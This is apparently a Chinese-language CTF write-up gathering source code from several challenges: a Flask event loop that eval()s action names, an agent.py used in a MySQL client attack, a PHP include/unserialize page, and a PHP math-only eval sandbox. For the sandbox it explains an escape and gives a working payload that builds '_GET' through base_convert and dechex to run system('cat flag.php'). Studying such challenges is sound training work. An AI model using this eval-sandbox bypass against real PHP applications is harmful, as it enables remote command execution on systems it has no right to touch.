ddctf的一道題目,學到了python eval函數的用法,首先分析題目:
# -*- encoding: utf-8 -*- # written in python 2.7 __author__ = 'garzon' from flask import Flask, session, request, Response import urllib app = Flask(__name__) app.secret_key = '*********************' # censored url_prefix = '/d5af31f99147e857' def FLAG(): return 'FLAG_is_here_but_i_wont_show_you' # censored def trigger_event(event): session['log'].append(event) if len(session['log']) > 5: session['log'] = session['log'][-5:] if type(event) == type([]): request.event_queue += event else: request.event_queue.append(event) def get_mid_str(haystack, prefix, postfix=None): haystack = haystack[haystack.find(prefix) + len(prefix):] if postfix is not None: haystack = haystack[:haystack.find(postfix)] return haystack class RollBackException: pass def execute_event_loop(): valid_event_chars = set('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_0123456789:;#') resp = None while len(request.event_queue) > 0: event = request.event_queue[0] # `event` is something like "action:ACTION;ARGS0#ARGS1#ARGS2......" request.event_queue = request.event_queue[1:] if not event.startswith(('action:', 'func:')): continue for c in event: if c not in valid_event_chars: break else: is_action = event[0] == 'a' action = get_mid_str(event, ':', ';') # index args = get_mid_str(event, action + ';').split('#') #True#True try: event_handler = eval(action + ('_handler' if is_action else '_function')) ret_val = event_handler(args) except RollBackException: if resp is None: resp = '' resp += 'ERROR! All transactions have been cancelled. <br />' resp += '<a href="./?action:view;index">Go back to index.html</a><br />' session['num_items'] = request.prev_session['num_items'] session['points'] = request.prev_session['points'] break except Exception, e: if resp is None: resp = '' # resp += str(e) # only for debugging continue if ret_val is not None: if resp is None: resp = ret_val else: resp += ret_val if resp is None or resp == '': resp = ('404 NOT FOUND', 404) session.modified = True return resp @app.route(url_prefix + '/') def entry_point(): querystring = urllib.unquote(request.query_string) request.event_queue = [] if querystring == '' or (not querystring.startswith('action:')) or len(querystring) > 100: querystring = 'action:index;False#False' if 'num_items' not in session: session['num_items'] = 0 session['points'] = 3 session['log'] = [] request.prev_session = dict(session) trigger_event(querystring) return execute_event_loop() # handlers/functions below -------------------------------------- def view_handler(args): page = args[0] html = '' html += '[INFO] you have {} diamonds, {} points now.<br />'.format(session['num_items'], session['points']) if page == 'index': html += '<a href="./?action:index;True%23False">View source code</a><br />' html += '<a href="./?action:view;shop">Go to e-shop</a><br />' html += '<a href="./?action:view;reset">Reset</a><br />' elif page == 'shop': html += '<a href="./?action:buy;1">Buy a diamond (1 point)</a><br />' elif page == 'reset': del session['num_items'] html += 'Session reset.<br />' html += '<a href="./?action:view;index">Go back to index.html</a><br />' return html def index_handler(args): bool_show_source = str(args[0]) bool_download_source = str(args[1]) if bool_show_source == 'True': source = open('eventLoop.py', 'r') html = '' if bool_download_source != 'True': html += '<a href="./?action:index;True%23True">Download this .py file</a><br />' html += '<a href="./?action:view;index">Go back to index.html</a><br />' for line in source: if bool_download_source != 'True': html += line.replace('&', '&').replace('\t', ' ' * 4).replace(' ', ' ').replace('<', '<').replace( '>', '>').replace('\n', '<br />') else: html += line source.close() if bool_download_source == 'True': headers = {} headers['Content-Type'] = 'text/plain' headers['Content-Disposition'] = 'attachment; filename=serve.py' return Response(html, headers=headers) else: return html else: trigger_event('action:view;index') def buy_handler(args): num_items = int(args[0]) if num_items <= 0: return 'invalid number({}) of diamonds to buy<br />'.format(args[0]) session['num_items'] += num_items trigger_event(['func:consume_point;{}'.format(num_items), 'action:view;index']) def consume_point_function(args): point_to_consume = int(args[0]) if session['points'] < point_to_consume: raise RollBackException() session['points'] -= point_to_consume def show_flag_function(args): flag = args[0] # return flag # GOTCHA! We noticed that here is a backdoor planted by a hacker which will print the flag, so we disabled it. return 'You naughty boy! ;) <br />' def get_flag_handler(args): if session['num_items'] >= 5: trigger_event('func:show_flag;' + FLAG()) # show_flag_function has been disabled, no worries trigger_event('action:view;index') if __name__ == '__main__': app.run(debug=False, host='')
#!/usr/bin/env python # -*- coding: utf-8 -*- # @Time : 12/1/2019 2:58 PM # @Author : fz # @Site : # @File : agent.py # @Software: PyCharm import json from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler from optparse import OptionParser from subprocess import Popen, PIPE class RequestHandler(BaseHTTPRequestHandler): def do_GET(self): request_path = self.path print("\n----- Request Start ----->\n") print("request_path :", request_path) print("self.headers :", self.headers) print("<----- Request End -----\n") self.send_response(200) self.send_header("Set-Cookie", "foo=bar") self.end_headers() result = self._func() self.wfile.write(json.dumps(result)) def do_POST(self): request_path = self.path # print("\n----- Request Start ----->\n") print("request_path : %s", request_path) request_headers = self.headers content_length = request_headers.getheaders('content-length') length = int(content_length[0]) if content_length else 0 # print("length :", length) print("request_headers : %s" % request_headers) print("content : %s" % self.rfile.read(length)) # print("<----- Request End -----\n") self.send_response(200) self.send_header("Set-Cookie", "foo=bar") self.end_headers() result = self._func() self.wfile.write(json.dumps(result)) def _func(self): netstat = Popen(['netstat', '-tlnp'], stdout=PIPE) netstat.wait() ps_list = netstat.stdout.readlines() result = [] for item in ps_list[2:]: tmp = item.split() Local_Address = tmp[3] Process_name = tmp[6] tmp_dic = {'local_address': Local_Address, 'Process_name': Process_name} result.append(tmp_dic) return result do_PUT = do_POST do_DELETE = do_GET def main(): port = 8123 print('Listening on localhost:%s' % port) server = HTTPServer(('', port), RequestHandler) server.serve_forever() if __name__ == "__main__": parser = OptionParser() parser.usage = ( "Creates an http-server that will echo out any GET or POST parameters, and respond with dummy data\n" "Run:\n\n") (options, args) = parser.parse_args() main()
這道題主要是來攻擊mysql鏈接的客戶端,這個題目給了agent.py 是用來檢測是否是服務器上存在mysqld進程,而判斷是經過do_get和do_post兩個函數肯定的,這兩個函數都會調用_func函數,返回進程名,而後do_get 和do_post再把_func的返回值輸出,sql
<html> <?php error_reporting(0); $file = $_GET["file"]; $payload = $_GET["payload"]; if(!isset($file)){ echo 'Missing parameter'.'<br>'; } if(preg_match("/flag/",$file)){ die('hack attacked!!!'); } @include($file); if(isset($payload)){ $url = parse_url($_SERVER['REQUEST_URI']); parse_str($url['query'],$query); foreach($query as $value){ if (preg_match("/flag/",$value)) { die('stop hacking!'); exit(); } } $payload = unserialize($payload); }else{ echo "Missing parameters"; } ?> <!--Please test index.php?file=xxx.php --> <!--Please get the source of hint.php--> </html>
<?php error_reporting(0); //據說你很喜歡數學,不知道你是否愛它賽過愛flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太長了不會算"); } $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]']; foreach ($blacklist as $blackitem) { if (preg_match('/' . $blackitem . '/m', $content)) { die("請不要輸入奇奇怪怪的字符"); } } //經常使用數學函數http://www.w3school.com.cn/php/php_ref_math.asp $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh']; preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs); foreach ($used_funcs[0] as $func) { if (!in_array($func, $whitelist)) { die("請不要輸入奇奇怪怪的函數"); } } //幫你算出答案 eval('echo '.$content.';'); }
這道題主要仍是構造沒有字母的shell,這裏面又提供了進制轉換的函數base_convert(),說明能夠用0-9a-z 36個字符,那麼就能夠構造shell,這裏主要經過分析一個payload:
$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=cat flag.php
這裏經過構造動態函數,首先base_convert()構造hex2bin,把16進制轉換爲字符串,再經過「_GET」 -> 16進製表示,再到10進製表示,而後反過來dechex()->hex2bin(),而後結合動態函數
好比$a="_GET";$$a{c}(($$a){d}); 這樣將實際的payload放在GET參數中,從而來減少長度。
for($j=0;$j<10;$j = $j+1){ for($i=0;$i<10;$i = $i+1){ echo $i.$j." "; echo "_G"^($j).($i); echo "\n"; }}